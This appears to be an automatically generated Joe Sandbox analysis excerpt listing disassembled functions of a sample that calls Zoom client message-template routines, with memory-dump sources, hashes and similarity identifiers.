                • Instruction Fuzzy Hash: 96E0DFB5A10380E7CB307B148C45B1EA6F4AB99B16F000529B6029F3D2CBF88884DB79
                Function 00C6E1E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E1E7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.load.request,00009D12,ConfigContent,00000004), ref: 00C6E202
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: ConfigContent$com.zoom.app.assistant.control.system.load.request
                • API String ID: 3166440930-1071028234
                • Opcode ID: ae365f31e668033372e063e6e75b24d4939b74ac590c8ca6e438adc4b4fc5c19
                • Instruction ID: 514aa389d2e177041a006920e6092d884bae23a73f9bf4e92a636989ba7c03e7
                • Opcode Fuzzy Hash: ae365f31e668033372e063e6e75b24d4939b74ac590c8ca6e438adc4b4fc5c19
                • Instruction Fuzzy Hash: 86E020B49003C1ABC720AB109D49B1E77B4DB40B16F40452DB2055F3D2CBF44C44D7B9
                Function 00C6E180 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E187
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.cec.standby.response,00009CDE,Result,00000004), ref: 00C6E1A2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Result$com.zoom.app.assistant.cec.standby.response
                • API String ID: 4281283084-2366485463
                • Opcode ID: 28965fc7cbd58ee730d32d40c003d14af5c5135106448d90c7f5129fe2586243
                • Instruction ID: 0c6282c39990ef8ccdf17a8ef47f78f2ddf68bd40947b5e9450fee25cfc73a1f
                • Opcode Fuzzy Hash: 28965fc7cbd58ee730d32d40c003d14af5c5135106448d90c7f5129fe2586243
                • Instruction Fuzzy Hash: 3FE0D8B0A50380A7D710BB158C45B5E26A4DB40B59F84447CB1045F383CBF44801EB74
                Function 00C70180 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70187
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.notify.bandwidth.limit,00002750,BandwidthInfo,00000004), ref: 00C701A2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: BandwidthInfo$com.Zoom.app.pt.notify.bandwidth.limit
                • API String ID: 3166440930-2443653156
                • Opcode ID: 31132edd311b04f33274948c24adf65149fa588a17dc0082e10f17b2f1e1ff3f
                • Instruction ID: dba8671f2dec36f07308827c670e680f9cef78ae4e568375d14447e13b0e9b21
                • Opcode Fuzzy Hash: 31132edd311b04f33274948c24adf65149fa588a17dc0082e10f17b2f1e1ff3f
                • Instruction Fuzzy Hash: A4E0D8B4A003A0A7E7207B104C85B1FB6B49744B55F504628B2055A3D2CBF48888D778
                Function 00C6E120 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E127
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.cec.poweron.response,00009CDC,Result,00000004), ref: 00C6E142
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Result$com.zoom.app.assistant.cec.poweron.response
                • API String ID: 4281283084-2854840679
                • Opcode ID: 7a736e8a389f06021e995381c6784aff212ebc12461b174785ef49688c38b500
                • Instruction ID: 3c714a1f865456eaa4ce9c3d52140a29bdcb2157fca32adf63ad655126ab028e
                • Opcode Fuzzy Hash: 7a736e8a389f06021e995381c6784aff212ebc12461b174785ef49688c38b500
                • Instruction Fuzzy Hash: 07E0DFB0A00380A7EB20BB108C89B2F26E4AB80B59FA4443CB2045B382CFF44841F778
                Function 00C74120 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74127
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.notify.pt.conf.my.statuus,0000277A,invite_bypass_wr,00000004), ref: 00C74142
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.notify.pt.conf.my.statuus$invite_bypass_wr
                • API String ID: 4281283084-636401198
                • Opcode ID: d969c54e044635f33c401650cd4291e7b2fa7c293c8306590b40c32a19569e2a
                • Instruction ID: 59f9f2538e9aeb63ca3b72f8970c22bf98ae44925811591eda4ea8a604c83d3d
                • Opcode Fuzzy Hash: d969c54e044635f33c401650cd4291e7b2fa7c293c8306590b40c32a19569e2a
                • Instruction Fuzzy Hash: 1EE0D8B0A143A467F720BF248C4572E26A4AB50B1AF944428B1085B3C1CFF44941D774
                Function 00C70120 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70127
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.upload.pbx.real.time.monitor.log.request,00009CE6,Log,00000004), ref: 00C70142
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Log$com.zoom.app.assistant.upload.pbx.real.time.monitor.log.request
                • API String ID: 3166440930-2276195319
                • Opcode ID: eac086b10dc27b673be5dadd34d73741126dd0e9614b83634da373892f5034d8
                • Instruction ID: d8afcbfa93809e95cd2ad6619dd14920fc36e872e4ac54a23f59b19c6a564bdc
                • Opcode Fuzzy Hash: eac086b10dc27b673be5dadd34d73741126dd0e9614b83634da373892f5034d8
                • Instruction Fuzzy Hash: 94E0DFF0E10380A7DB207B148D45B2E66F4AB48B5AF40442CB6025B3D2CBF48888DBB9
                Function 00C72130 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72137
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.recordingstatechange.notify,00009E8B,RecordingState,00000004), ref: 00C72152
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: RecordingState$com.zoom.app.cci.ccivideo.recordingstatechange.notify
                • API String ID: 4281283084-4115089828
                • Opcode ID: 23d20966b11d54588a9243bd58b58f2b1e263473a9f67f2aec0bddc409a9539a
                • Instruction ID: a356897b0e0fc5cb5a2281655cc543af865bf83b91173b780b3a22a05002bb4a
                • Opcode Fuzzy Hash: 23d20966b11d54588a9243bd58b58f2b1e263473a9f67f2aec0bddc409a9539a
                • Instruction Fuzzy Hash: EBE0D870900380A7D724BF248C0572E26A4FB80B55F984528B2085B382CFF44841E774
                Function 00C682B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C682B7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.saveFileInMeetingChat,0000274F,result,00000004), ref: 00C682D2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
